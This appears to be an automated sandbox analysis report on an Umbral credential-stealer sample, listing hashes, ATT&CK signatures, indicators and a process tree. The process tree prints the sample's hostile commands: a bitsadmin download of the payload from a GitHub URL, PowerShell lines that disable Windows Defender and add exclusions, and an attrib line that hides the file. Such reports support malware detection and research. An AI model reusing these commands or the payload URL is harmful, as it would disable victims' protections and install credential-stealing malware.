umbral | ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093

Analysis

max time kernel
106s
max time network
157s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
09-08-2024 00:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.exe
Size

187KB
MD5

758180c588bfffa96aa400d55513502f
SHA1

558e8ce1e7db1e04ab612390855052a6fcde25a4
SHA256

ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093
SHA512

d66210dc71ecafd017dbd63301f8072550670ee900d254bb2649e27a9c6ae69dcb86f8b9d1f35663fec979fa6f8dda4e6e49865744f72c4b17ef450ddb678f68
SSDEEP

3072:PV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnP9vg0UasVmkoYcMK/C:Ct5hBPi0BW69hd1MMdxPe9N9uA069TBE

Score

10^/10

umbral credential_access discovery dropper execution exploit ransomware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/4348-2-0x000002C119870000-0x000002C1198B0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 6 IoCs

flow	pid	Process
9	3760	WScript.exe
11	3760	WScript.exe
16	4772	WScript.exe
17	4772	WScript.exe
18	4772	WScript.exe
19	4772	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3664	powershell.exe
2008	powershell.exe
4876	powershell.exe
1496	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
728	bitsadmin.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
4492	takeown.exe
3328	icacls.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
8	melter.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4492	takeown.exe
3328	icacls.exe

Enumerates connected drives 3 TTPs 47 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\D:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
4	discord.com
6	raw.githubusercontent.com
13	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 64 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa	cmd.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\classes.jsa	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	melter.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
916	cmd.exe
4584	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4932	timeout.exe
3020	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4292	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
2040	taskkill.exe
1596	taskkill.exe
4848	taskkill.exe
1452	taskkill.exe
3112	taskkill.exe
4816	taskkill.exe
1468	taskkill.exe
1572	taskkill.exe
4668	taskkill.exe
4664	taskkill.exe
3328	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4584	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4348	Umbral.exe
3664	powershell.exe
3664	powershell.exe
2008	powershell.exe
2008	powershell.exe
4876	powershell.exe
4876	powershell.exe
1544	powershell.exe
1544	powershell.exe
1496	powershell.exe
1496	powershell.exe
3144	msedge.exe
3144	msedge.exe
1480	msedge.exe
1480	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	4492	takeown.exe
Token: SeTakeOwnershipPrivilege	4492	takeown.exe
Token: SeTakeOwnershipPrivilege	4492	takeown.exe
Token: SeTakeOwnershipPrivilege	4492	takeown.exe
Token: SeDebugPrivilege	4348	Umbral.exe
Token: SeIncreaseQuotaPrivilege	3844	wmic.exe
Token: SeSecurityPrivilege	3844	wmic.exe
Token: SeTakeOwnershipPrivilege	3844	wmic.exe
Token: SeLoadDriverPrivilege	3844	wmic.exe
Token: SeSystemProfilePrivilege	3844	wmic.exe
Token: SeSystemtimePrivilege	3844	wmic.exe
Token: SeProfSingleProcessPrivilege	3844	wmic.exe
Token: SeIncBasePriorityPrivilege	3844	wmic.exe
Token: SeCreatePagefilePrivilege	3844	wmic.exe
Token: SeBackupPrivilege	3844	wmic.exe
Token: SeRestorePrivilege	3844	wmic.exe
Token: SeShutdownPrivilege	3844	wmic.exe
Token: SeDebugPrivilege	3844	wmic.exe
Token: SeSystemEnvironmentPrivilege	3844	wmic.exe
Token: SeRemoteShutdownPrivilege	3844	wmic.exe
Token: SeUndockPrivilege	3844	wmic.exe
Token: SeManageVolumePrivilege	3844	wmic.exe
Token: 33	3844	wmic.exe
Token: 34	3844	wmic.exe
Token: 35	3844	wmic.exe
Token: 36	3844	wmic.exe
Token: SeIncreaseQuotaPrivilege	3844	wmic.exe
Token: SeSecurityPrivilege	3844	wmic.exe
Token: SeTakeOwnershipPrivilege	3844	wmic.exe
Token: SeLoadDriverPrivilege	3844	wmic.exe
Token: SeSystemProfilePrivilege	3844	wmic.exe
Token: SeSystemtimePrivilege	3844	wmic.exe
Token: SeProfSingleProcessPrivilege	3844	wmic.exe
Token: SeIncBasePriorityPrivilege	3844	wmic.exe
Token: SeCreatePagefilePrivilege	3844	wmic.exe
Token: SeBackupPrivilege	3844	wmic.exe
Token: SeRestorePrivilege	3844	wmic.exe
Token: SeShutdownPrivilege	3844	wmic.exe
Token: SeDebugPrivilege	3844	wmic.exe
Token: SeSystemEnvironmentPrivilege	3844	wmic.exe
Token: SeRemoteShutdownPrivilege	3844	wmic.exe
Token: SeUndockPrivilege	3844	wmic.exe
Token: SeManageVolumePrivilege	3844	wmic.exe
Token: 33	3844	wmic.exe
Token: 34	3844	wmic.exe
Token: 35	3844	wmic.exe
Token: 36	3844	wmic.exe
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeIncreaseQuotaPrivilege	2084	wmic.exe
Token: SeSecurityPrivilege	2084	wmic.exe
Token: SeTakeOwnershipPrivilege	2084	wmic.exe
Token: SeLoadDriverPrivilege	2084	wmic.exe
Token: SeSystemProfilePrivilege	2084	wmic.exe
Token: SeSystemtimePrivilege	2084	wmic.exe
Token: SeProfSingleProcessPrivilege	2084	wmic.exe
Token: SeIncBasePriorityPrivilege	2084	wmic.exe
Token: SeCreatePagefilePrivilege	2084	wmic.exe
Token: SeBackupPrivilege	2084	wmic.exe
Token: SeRestorePrivilege	2084	wmic.exe
Token: SeShutdownPrivilege	2084	wmic.exe
Token: SeDebugPrivilege	2084	wmic.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4412	PickerHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 224 wrote to memory of 4344	224	test.exe	81
PID 224 wrote to memory of 4344	224	test.exe	81
PID 4344 wrote to memory of 728	4344	cmd.exe	83
PID 4344 wrote to memory of 728	4344	cmd.exe	83
PID 4344 wrote to memory of 4348	4344	cmd.exe	86
PID 4344 wrote to memory of 4348	4344	cmd.exe	86
PID 4344 wrote to memory of 4492	4344	cmd.exe	87
PID 4344 wrote to memory of 4492	4344	cmd.exe	87
PID 4344 wrote to memory of 3328	4344	cmd.exe	88
PID 4344 wrote to memory of 3328	4344	cmd.exe	88
PID 4344 wrote to memory of 1556	4344	cmd.exe	89
PID 4344 wrote to memory of 1556	4344	cmd.exe	89
PID 4344 wrote to memory of 2924	4344	cmd.exe	90
PID 4344 wrote to memory of 2924	4344	cmd.exe	90
PID 4348 wrote to memory of 3844	4348	Umbral.exe	91
PID 4348 wrote to memory of 3844	4348	Umbral.exe	91
PID 4344 wrote to memory of 548	4344	cmd.exe	93
PID 4344 wrote to memory of 548	4344	cmd.exe	93
PID 4344 wrote to memory of 3760	4344	cmd.exe	94
PID 4344 wrote to memory of 3760	4344	cmd.exe	94
PID 4344 wrote to memory of 4932	4344	cmd.exe	95
PID 4344 wrote to memory of 4932	4344	cmd.exe	95
PID 4348 wrote to memory of 2260	4348	Umbral.exe	97
PID 4348 wrote to memory of 2260	4348	Umbral.exe	97
PID 4348 wrote to memory of 3664	4348	Umbral.exe	99
PID 4348 wrote to memory of 3664	4348	Umbral.exe	99
PID 4348 wrote to memory of 2008	4348	Umbral.exe	101
PID 4348 wrote to memory of 2008	4348	Umbral.exe	101
PID 4348 wrote to memory of 4876	4348	Umbral.exe	103
PID 4348 wrote to memory of 4876	4348	Umbral.exe	103
PID 4348 wrote to memory of 1544	4348	Umbral.exe	105
PID 4348 wrote to memory of 1544	4348	Umbral.exe	105
PID 4348 wrote to memory of 2084	4348	Umbral.exe	107
PID 4348 wrote to memory of 2084	4348	Umbral.exe	107
PID 4348 wrote to memory of 3172	4348	Umbral.exe	109
PID 4348 wrote to memory of 3172	4348	Umbral.exe	109
PID 4348 wrote to memory of 4868	4348	Umbral.exe	111
PID 4348 wrote to memory of 4868	4348	Umbral.exe	111
PID 4348 wrote to memory of 1496	4348	Umbral.exe	113
PID 4348 wrote to memory of 1496	4348	Umbral.exe	113
PID 4348 wrote to memory of 4292	4348	Umbral.exe	115
PID 4348 wrote to memory of 4292	4348	Umbral.exe	115
PID 4348 wrote to memory of 916	4348	Umbral.exe	117
PID 4348 wrote to memory of 916	4348	Umbral.exe	117
PID 916 wrote to memory of 4584	916	cmd.exe	119
PID 916 wrote to memory of 4584	916	cmd.exe	119
PID 4344 wrote to memory of 2336	4344	cmd.exe	120
PID 4344 wrote to memory of 2336	4344	cmd.exe	120
PID 4344 wrote to memory of 2064	4344	cmd.exe	121
PID 4344 wrote to memory of 2064	4344	cmd.exe	121
PID 4344 wrote to memory of 3020	4344	cmd.exe	122
PID 4344 wrote to memory of 3020	4344	cmd.exe	122
PID 4344 wrote to memory of 2040	4344	cmd.exe	124
PID 4344 wrote to memory of 2040	4344	cmd.exe	124
PID 4344 wrote to memory of 4816	4344	cmd.exe	125
PID 4344 wrote to memory of 4816	4344	cmd.exe	125
PID 4344 wrote to memory of 1468	4344	cmd.exe	126
PID 4344 wrote to memory of 1468	4344	cmd.exe	126
PID 4344 wrote to memory of 1596	4344	cmd.exe	127
PID 4344 wrote to memory of 1596	4344	cmd.exe	127
PID 4344 wrote to memory of 1572	4344	cmd.exe	128
PID 4344 wrote to memory of 1572	4344	cmd.exe	128
PID 4344 wrote to memory of 4848	4344	cmd.exe	129
PID 4344 wrote to memory of 4848	4344	cmd.exe	129

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2260	attrib.exe

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:224
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8BD5.tmp\8BD6.tmp\8BD7.bat C:\Users\Admin\AppData\Local\Temp\test.exe"
  2⤵
  - Drops startup file
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4344
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    3⤵
    - Download via BitsAdmin
    PID:728
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Drops file in Drivers directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4348
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3844
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Views/modifies file attributes
      PID:2260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
